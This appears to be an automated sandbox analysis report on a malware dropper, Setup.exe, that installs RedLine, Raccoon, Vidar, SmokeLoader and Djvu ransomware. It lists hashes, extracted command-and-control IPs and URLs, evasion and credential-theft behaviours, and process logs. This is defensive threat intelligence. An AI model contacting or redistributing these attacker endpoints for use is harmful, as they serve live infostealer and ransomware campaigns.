amadey | 40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5

Target

Setup.exe
Size

1.6MB
MD5

ce6eaa52767b2df78b34519231966588
SHA1

ab32d09951189022a1a39e9204ec9ce2926b3fcf
SHA256

40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5
SHA512

36a09fe704823d6db5d0982d761ba1976c940b82b7c1ca650627d66e16b420612b78c761f2ed00e533453eeb2dd7e431cf47b0c2cf826354aa6e779fda531067

Malware Config

Extracted

Family

redline

Botnet

update

135.181.79.37:32157

Extracted

Family

raccoon

Botnet

a7a7651f160522c3eb3c593186fb8a026774778c

Attributes

url4cnc
http://telegatt.top/kaba4ello
http://telegka.top/kaba4ello
http://telegin.top/kaba4ello
https://t.me/kaba4ello

rc4.plain

Extracted

Family

vidar

Version

41.5

Botnet

937

https://mas.to/@xeroxxx

Attributes

profile_id
937

Extracted

Family

smokeloader

Version

2020

http://honawey7.top/

http://wijibui0.top/

http://hefahei6.top/

http://pipevai4.top/

http://nalirou7.top/

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

djvu

http://rlrz.org/lancer

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\QN3lhXOYpq_dRAROlLL3SI2l.exe	family_redline
C:\Users\Admin\Documents\QN3lhXOYpq_dRAROlLL3SI2l.exe	family_redline
behavioral3/memory/4244-270-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral3/memory/4244-271-0x000000000041B24E-mapping.dmp	family_redline
behavioral3/memory/4244-281-0x0000000004C00000-0x0000000005206000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\TDxoBCJZoK1gZeLNzd8xeRh1.exe	family_socelars
C:\Users\Admin\Documents\TDxoBCJZoK1gZeLNzd8xeRh1.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral3/memory/1032-292-0x0000000004A20000-0x0000000004AF6000-memory.dmp	family_vidar
behavioral3/memory/1032-298-0x0000000000400000-0x0000000002E0F000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 32 IoCs

Processes:

QN3lhXOYpq_dRAROlLL3SI2l.exeXoVho49dQDFLAbtqxLkbbptH.exeJfM3PwEOmENxO0yB0SdCtog7.exe7xHyxNFDKgC97CSuVHV9ZNPY.exenbAhGCeUPYt1c7OT1icRlCe4.exeTDxoBCJZoK1gZeLNzd8xeRh1.exeU2kwiJBFqC05A70eN9Db2kYN.exeaWWTwMZt99Lewmzjobn3Q0BJ.exeiPF2G3__Mcs3AMbowRlloXk8.exeyIOViLE6NiTbJbljLUnCyJgg.exexlu6sWH4AJ_SSHElWkw0Q4KE.exe9Q0WjbSfae46NAERBfzkGpUZ.exe_h8awGXCAaLKdrj2Cr7DUqne.exea7P9a0lUNxcatcFiD1Swk16R.exezFUZaxEbR2NXdHS9pZoPfmJ1.exeeLMtdjybMjVt9OmuDLYyxaBx.exe9xiwBu1hve2uYmiUM8sWumJo.exekdSRwVNcQGlBHuC6yHaVd4RP.exeVxPGzn_0xISnhFtUC4USvMnf.executm3.exeDownFlSetup999.exeinst3.exexlu6sWH4AJ_SSHElWkw0Q4KE.exeJfM3PwEOmENxO0yB0SdCtog7.exe8197254.exeWBmvJwiE2UBHV5jWyYSSkYCd.exe1501216.exe8pWB.eXE4540816.exe2883812.exewmiprvse.exe3698175.exe

pid	process
3184	QN3lhXOYpq_dRAROlLL3SI2l.exe
3476	XoVho49dQDFLAbtqxLkbbptH.exe
3920	JfM3PwEOmENxO0yB0SdCtog7.exe
3576	7xHyxNFDKgC97CSuVHV9ZNPY.exe
364	nbAhGCeUPYt1c7OT1icRlCe4.exe
3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
1184	U2kwiJBFqC05A70eN9Db2kYN.exe
2400	aWWTwMZt99Lewmzjobn3Q0BJ.exe
660	iPF2G3__Mcs3AMbowRlloXk8.exe
1708	yIOViLE6NiTbJbljLUnCyJgg.exe
3416	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
1032	9Q0WjbSfae46NAERBfzkGpUZ.exe
1248	_h8awGXCAaLKdrj2Cr7DUqne.exe
2780	a7P9a0lUNxcatcFiD1Swk16R.exe
1416	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
1700	eLMtdjybMjVt9OmuDLYyxaBx.exe
2124	9xiwBu1hve2uYmiUM8sWumJo.exe
1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe
2076	VxPGzn_0xISnhFtUC4USvMnf.exe
3140	cutm3.exe
3752	DownFlSetup999.exe
1696	inst3.exe
4244	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
4548	JfM3PwEOmENxO0yB0SdCtog7.exe
4632	8197254.exe
4904	WBmvJwiE2UBHV5jWyYSSkYCd.exe
4928	1501216.exe
5080	8pWB.eXE
4132	4540816.exe
984	2883812.exe
1232	wmiprvse.exe
4576	3698175.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VxPGzn_0xISnhFtUC4USvMnf.exeaWWTwMZt99Lewmzjobn3Q0BJ.exe1501216.exeXoVho49dQDFLAbtqxLkbbptH.exezFUZaxEbR2NXdHS9pZoPfmJ1.exe9xiwBu1hve2uYmiUM8sWumJo.exea7P9a0lUNxcatcFiD1Swk16R.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VxPGzn_0xISnhFtUC4USvMnf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aWWTwMZt99Lewmzjobn3Q0BJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VxPGzn_0xISnhFtUC4USvMnf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aWWTwMZt99Lewmzjobn3Q0BJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1501216.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1501216.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	XoVho49dQDFLAbtqxLkbbptH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9xiwBu1hve2uYmiUM8sWumJo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9xiwBu1hve2uYmiUM8sWumJo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	XoVho49dQDFLAbtqxLkbbptH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a7P9a0lUNxcatcFiD1Swk16R.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a7P9a0lUNxcatcFiD1Swk16R.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Setup.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Setup.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

6500 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	Setup.exe

pid	process
6500	icacls.exe

Themida packer 25 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\aWWTwMZt99Lewmzjobn3Q0BJ.exe	themida
C:\Users\Admin\Documents\XoVho49dQDFLAbtqxLkbbptH.exe	themida
C:\Users\Admin\Documents\a7P9a0lUNxcatcFiD1Swk16R.exe	themida
C:\Users\Admin\Documents\VxPGzn_0xISnhFtUC4USvMnf.exe	themida
C:\Users\Admin\Documents\9xiwBu1hve2uYmiUM8sWumJo.exe	themida
C:\Users\Admin\Documents\zFUZaxEbR2NXdHS9pZoPfmJ1.exe	themida
C:\Users\Admin\Documents\VxPGzn_0xISnhFtUC4USvMnf.exe	themida
C:\Users\Admin\Documents\aWWTwMZt99Lewmzjobn3Q0BJ.exe	themida
C:\Users\Admin\Documents\9xiwBu1hve2uYmiUM8sWumJo.exe	themida
C:\Users\Admin\Documents\zFUZaxEbR2NXdHS9pZoPfmJ1.exe	themida
behavioral3/memory/2076-182-0x0000000140000000-0x0000000140B99000-memory.dmp	themida
behavioral3/memory/3476-223-0x00000000003E0000-0x00000000003E1000-memory.dmp	themida
behavioral3/memory/1416-233-0x0000000000140000-0x0000000000141000-memory.dmp	themida
behavioral3/memory/2780-236-0x00000000008C0000-0x00000000008C1000-memory.dmp	themida
behavioral3/memory/2124-222-0x0000000000110000-0x0000000000111000-memory.dmp	themida
behavioral3/memory/2400-213-0x0000000000860000-0x0000000000861000-memory.dmp	themida
behavioral3/memory/2076-173-0x0000000140000000-0x0000000140B99000-memory.dmp	themida
C:\Users\Admin\Documents\XoVho49dQDFLAbtqxLkbbptH.exe	themida
C:\Users\Admin\Documents\a7P9a0lUNxcatcFiD1Swk16R.exe	themida
C:\Users\Admin\AppData\Roaming\1501216.exe	themida
C:\Users\Admin\AppData\Roaming\4540816.exe	themida
C:\Users\Admin\AppData\Roaming\2883812.exe	themida
C:\Users\Admin\AppData\Roaming\4540816.exe	themida
C:\Users\Admin\AppData\Roaming\1501216.exe	themida
behavioral3/memory/2076-511-0x0000000140000000-0x0000000140B99000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

zFUZaxEbR2NXdHS9pZoPfmJ1.exe9xiwBu1hve2uYmiUM8sWumJo.exea7P9a0lUNxcatcFiD1Swk16R.exe1501216.exeVxPGzn_0xISnhFtUC4USvMnf.exeaWWTwMZt99Lewmzjobn3Q0BJ.exeXoVho49dQDFLAbtqxLkbbptH.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9xiwBu1hve2uYmiUM8sWumJo.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a7P9a0lUNxcatcFiD1Swk16R.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1501216.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VxPGzn_0xISnhFtUC4USvMnf.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aWWTwMZt99Lewmzjobn3Q0BJ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	XoVho49dQDFLAbtqxLkbbptH.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

121 ipinfo.io
122 ipinfo.io
141 ip-api.com
183 ipinfo.io
1806 api.2ip.ua
2323 api.2ip.ua
8 ipinfo.io
9 ipinfo.io
1809 api.2ip.ua

flow	ioc
121	ipinfo.io
122	ipinfo.io
141	ip-api.com
183	ipinfo.io
1806	api.2ip.ua
2323	api.2ip.ua
8	ipinfo.io
9	ipinfo.io
1809	api.2ip.ua

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

XoVho49dQDFLAbtqxLkbbptH.exeaWWTwMZt99Lewmzjobn3Q0BJ.exe9xiwBu1hve2uYmiUM8sWumJo.exezFUZaxEbR2NXdHS9pZoPfmJ1.exea7P9a0lUNxcatcFiD1Swk16R.exe1501216.exe4540816.exe

pid	process
3476	XoVho49dQDFLAbtqxLkbbptH.exe
2400	aWWTwMZt99Lewmzjobn3Q0BJ.exe
2124	9xiwBu1hve2uYmiUM8sWumJo.exe
1416	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
2780	a7P9a0lUNxcatcFiD1Swk16R.exe
4928	1501216.exe
4132	4540816.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

xlu6sWH4AJ_SSHElWkw0Q4KE.execmd.exe

description	pid	process	target process
PID 3416 set thread context of 4244	3416	xlu6sWH4AJ_SSHElWkw0Q4KE.exe	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
PID 3920 set thread context of 4548	3920	cmd.exe	JfM3PwEOmENxO0yB0SdCtog7.exe

Drops file in Program Files directory 7 IoCs

Processes:

kdSRwVNcQGlBHuC6yHaVd4RP.exenbAhGCeUPYt1c7OT1icRlCe4.exe

description	ioc	process
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	kdSRwVNcQGlBHuC6yHaVd4RP.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	nbAhGCeUPYt1c7OT1icRlCe4.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	nbAhGCeUPYt1c7OT1icRlCe4.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst3.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe

Drops file in Windows directory 1 IoCs

Processes:

VxPGzn_0xISnhFtUC4USvMnf.exe

description ioc process

File created C:\Windows\System\xxx1.bak VxPGzn_0xISnhFtUC4USvMnf.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\System\xxx1.bak	VxPGzn_0xISnhFtUC4USvMnf.exe

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4728	1700	WerFault.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
2480	1700	WerFault.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
4348	1700	WerFault.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
4604	1700	WerFault.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
5600	1700	WerFault.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
5360	660	WerFault.exe	iPF2G3__Mcs3AMbowRlloXk8.exe
2360	4516	WerFault.exe	xH2JTFuAPmfO0u9nbpzCzlep.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

JfM3PwEOmENxO0yB0SdCtog7.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JfM3PwEOmENxO0yB0SdCtog7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JfM3PwEOmENxO0yB0SdCtog7.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	JfM3PwEOmENxO0yB0SdCtog7.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5008 schtasks.exe
4956 schtasks.exe
5776 schtasks.exe
6508 schtasks.exe
6716 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

6868 timeout.exe
716 timeout.exe
5528 timeout.exe
5884 timeout.exe

pid	process
5008	schtasks.exe
4956	schtasks.exe
5776	schtasks.exe
6508	schtasks.exe
6716	schtasks.exe

pid	process
6868	timeout.exe
716	timeout.exe
5528	timeout.exe
5884	timeout.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5048	taskkill.exe
4468	taskkill.exe
1760	taskkill.exe
576	taskkill.exe
5084	taskkill.exe
6872	taskkill.exe
5024	taskkill.exe
1528	taskkill.exe
568	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exeXoVho49dQDFLAbtqxLkbbptH.exeaWWTwMZt99Lewmzjobn3Q0BJ.exe9xiwBu1hve2uYmiUM8sWumJo.exezFUZaxEbR2NXdHS9pZoPfmJ1.exea7P9a0lUNxcatcFiD1Swk16R.exeJfM3PwEOmENxO0yB0SdCtog7.exeWerFault.exe8197254.exe1501216.exeWerFault.exe

pid	process
1656	Setup.exe
1656	Setup.exe
3476	XoVho49dQDFLAbtqxLkbbptH.exe
3476	XoVho49dQDFLAbtqxLkbbptH.exe
2400	aWWTwMZt99Lewmzjobn3Q0BJ.exe
2400	aWWTwMZt99Lewmzjobn3Q0BJ.exe
2124	9xiwBu1hve2uYmiUM8sWumJo.exe
2124	9xiwBu1hve2uYmiUM8sWumJo.exe
1416	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
1416	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
2780	a7P9a0lUNxcatcFiD1Swk16R.exe
2780	a7P9a0lUNxcatcFiD1Swk16R.exe
4548	JfM3PwEOmENxO0yB0SdCtog7.exe
4548	JfM3PwEOmENxO0yB0SdCtog7.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4728	WerFault.exe
4632	8197254.exe
4632	8197254.exe
4928	1501216.exe
4928	1501216.exe
3020
3020
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
2480	WerFault.exe
3020
3020
3020
3020
3020

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

JfM3PwEOmENxO0yB0SdCtog7.exe

pid process

4548 JfM3PwEOmENxO0yB0SdCtog7.exe

pid	process
4548	JfM3PwEOmENxO0yB0SdCtog7.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

TDxoBCJZoK1gZeLNzd8xeRh1.exeU2kwiJBFqC05A70eN9Db2kYN.exeDownFlSetup999.exeaWWTwMZt99Lewmzjobn3Q0BJ.exeQN3lhXOYpq_dRAROlLL3SI2l.exeWerFault.exe9xiwBu1hve2uYmiUM8sWumJo.exezFUZaxEbR2NXdHS9pZoPfmJ1.exeXoVho49dQDFLAbtqxLkbbptH.exea7P9a0lUNxcatcFiD1Swk16R.exe8197254.exexlu6sWH4AJ_SSHElWkw0Q4KE.exeWerFault.exe

description	pid	process
Token: SeCreateTokenPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeAssignPrimaryTokenPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeLockMemoryPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeIncreaseQuotaPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeMachineAccountPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeTcbPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeSecurityPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeTakeOwnershipPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeLoadDriverPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeSystemProfilePrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeSystemtimePrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeProfSingleProcessPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeIncBasePriorityPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeCreatePagefilePrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeCreatePermanentPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeBackupPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeRestorePrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeShutdownPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeDebugPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeAuditPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeSystemEnvironmentPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeChangeNotifyPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeRemoteShutdownPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeUndockPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeSyncAgentPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeEnableDelegationPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeManageVolumePrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeImpersonatePrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeCreateGlobalPrivilege	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: 31	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: 32	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: 33	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: 34	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: 35	3596	TDxoBCJZoK1gZeLNzd8xeRh1.exe
Token: SeDebugPrivilege	1184	U2kwiJBFqC05A70eN9Db2kYN.exe
Token: SeDebugPrivilege	3752	DownFlSetup999.exe
Token: SeDebugPrivilege	2400	aWWTwMZt99Lewmzjobn3Q0BJ.exe
Token: SeDebugPrivilege	3184	QN3lhXOYpq_dRAROlLL3SI2l.exe
Token: SeRestorePrivilege	4728	WerFault.exe
Token: SeBackupPrivilege	4728	WerFault.exe
Token: SeDebugPrivilege	2124	9xiwBu1hve2uYmiUM8sWumJo.exe
Token: SeDebugPrivilege	1416	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
Token: SeDebugPrivilege	3476	XoVho49dQDFLAbtqxLkbbptH.exe
Token: SeDebugPrivilege	4728	WerFault.exe
Token: SeDebugPrivilege	2780	a7P9a0lUNxcatcFiD1Swk16R.exe
Token: SeDebugPrivilege	4632	8197254.exe
Token: SeDebugPrivilege	4244	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
Token: SeDebugPrivilege	2480	WerFault.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exekdSRwVNcQGlBHuC6yHaVd4RP.exe7xHyxNFDKgC97CSuVHV9ZNPY.exe

description	pid	process	target process
PID 1656 wrote to memory of 3576	1656	Setup.exe	7xHyxNFDKgC97CSuVHV9ZNPY.exe
PID 1656 wrote to memory of 3576	1656	Setup.exe	7xHyxNFDKgC97CSuVHV9ZNPY.exe
PID 1656 wrote to memory of 3576	1656	Setup.exe	7xHyxNFDKgC97CSuVHV9ZNPY.exe
PID 1656 wrote to memory of 3596	1656	Setup.exe	TDxoBCJZoK1gZeLNzd8xeRh1.exe
PID 1656 wrote to memory of 3596	1656	Setup.exe	TDxoBCJZoK1gZeLNzd8xeRh1.exe
PID 1656 wrote to memory of 3596	1656	Setup.exe	TDxoBCJZoK1gZeLNzd8xeRh1.exe
PID 1656 wrote to memory of 3476	1656	Setup.exe	XoVho49dQDFLAbtqxLkbbptH.exe
PID 1656 wrote to memory of 3476	1656	Setup.exe	XoVho49dQDFLAbtqxLkbbptH.exe
PID 1656 wrote to memory of 3476	1656	Setup.exe	XoVho49dQDFLAbtqxLkbbptH.exe
PID 1656 wrote to memory of 3184	1656	Setup.exe	QN3lhXOYpq_dRAROlLL3SI2l.exe
PID 1656 wrote to memory of 3184	1656	Setup.exe	QN3lhXOYpq_dRAROlLL3SI2l.exe
PID 1656 wrote to memory of 3184	1656	Setup.exe	QN3lhXOYpq_dRAROlLL3SI2l.exe
PID 1656 wrote to memory of 3920	1656	Setup.exe	JfM3PwEOmENxO0yB0SdCtog7.exe
PID 1656 wrote to memory of 3920	1656	Setup.exe	JfM3PwEOmENxO0yB0SdCtog7.exe
PID 1656 wrote to memory of 3920	1656	Setup.exe	JfM3PwEOmENxO0yB0SdCtog7.exe
PID 1656 wrote to memory of 364	1656	Setup.exe	nbAhGCeUPYt1c7OT1icRlCe4.exe
PID 1656 wrote to memory of 364	1656	Setup.exe	nbAhGCeUPYt1c7OT1icRlCe4.exe
PID 1656 wrote to memory of 364	1656	Setup.exe	nbAhGCeUPYt1c7OT1icRlCe4.exe
PID 1656 wrote to memory of 1184	1656	Setup.exe	U2kwiJBFqC05A70eN9Db2kYN.exe
PID 1656 wrote to memory of 1184	1656	Setup.exe	U2kwiJBFqC05A70eN9Db2kYN.exe
PID 1656 wrote to memory of 1184	1656	Setup.exe	U2kwiJBFqC05A70eN9Db2kYN.exe
PID 1656 wrote to memory of 2400	1656	Setup.exe	aWWTwMZt99Lewmzjobn3Q0BJ.exe
PID 1656 wrote to memory of 2400	1656	Setup.exe	aWWTwMZt99Lewmzjobn3Q0BJ.exe
PID 1656 wrote to memory of 2400	1656	Setup.exe	aWWTwMZt99Lewmzjobn3Q0BJ.exe
PID 1656 wrote to memory of 660	1656	Setup.exe	iPF2G3__Mcs3AMbowRlloXk8.exe
PID 1656 wrote to memory of 660	1656	Setup.exe	iPF2G3__Mcs3AMbowRlloXk8.exe
PID 1656 wrote to memory of 660	1656	Setup.exe	iPF2G3__Mcs3AMbowRlloXk8.exe
PID 1656 wrote to memory of 1708	1656	Setup.exe	yIOViLE6NiTbJbljLUnCyJgg.exe
